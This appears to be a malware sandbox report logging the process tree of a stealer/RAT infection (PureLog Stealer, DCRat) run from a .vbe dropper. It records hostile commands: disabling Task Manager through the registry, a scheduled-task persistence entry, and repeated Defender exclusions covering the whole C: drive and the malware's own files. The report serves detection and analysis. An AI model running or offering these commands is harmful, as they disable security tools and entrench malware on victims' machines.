                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe"
                                                          Imagebase:0xbf0000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:20:22:22
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\EgkshvK6qarKZkry.bat" "
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:20:22:22
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:20:22:22
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                          Imagebase:0x710000
                                                          File size:59'392 bytes
                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:20:22:22
                                                          Start date:30/12/2024
                                                          Path:C:\fontdriversavescrt\ComComponentDriverInto.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\fontdriversavescrt/ComComponentDriverInto.exe"
                                                          Imagebase:0x490000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000000.1944436604.0000000000492000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.2200435861.000000001299D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\fontdriversavescrt\ComComponentDriverInto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\fontdriversavescrt\ComComponentDriverInto.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 78%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:20:22:25
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline"
                                                          Imagebase:0x7ff609b70000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:20:22:25
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:20:22:25
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC076.tmp" "c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP"
                                                          Imagebase:0x7ff631da0000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:20:22:25
                                                          Start date:30/12/2024
                                                          Path:C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                                                          Imagebase:0x3a0000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          • Detection: 60%, Virustotal, Browse
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:20:22:25
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:20:22:25
                                                          Start date:30/12/2024
                                                          Path:C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                                                          Imagebase:0x190000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:34
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:35
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:36
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:37
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:38
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:39
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:40
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:41
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:42
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:43
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:44
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:45
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:46
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:47
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:48
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:49
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:50
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:51
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:52
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:53
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:54
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:55
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:56
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:57
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:58
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:59
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:60
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:61
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:62
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:63
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:64
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:65
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:66
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'
                                                          Imagebase:0x7ff788560000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:67
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:68
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:69
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:70
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:71
                                                          Start time:20:22:26
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          General

                                                          Target ID:72
                                                          Start time:20:22:27
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\h43HaGdPC8.bat"
                                                          Imagebase:0x7ff7a37f0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:73
                                                          Start time:20:22:28
                                                          Start date:30/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:74
                                                          Start time:20:22:29
                                                          Start date:30/12/2024
                                                          Path:C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
                                                          Imagebase:0xd50000
                                                          File size:2'039'296 bytes
                                                          MD5 hash:715951FB52F5F8D7603E8E2B1DB98A4D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
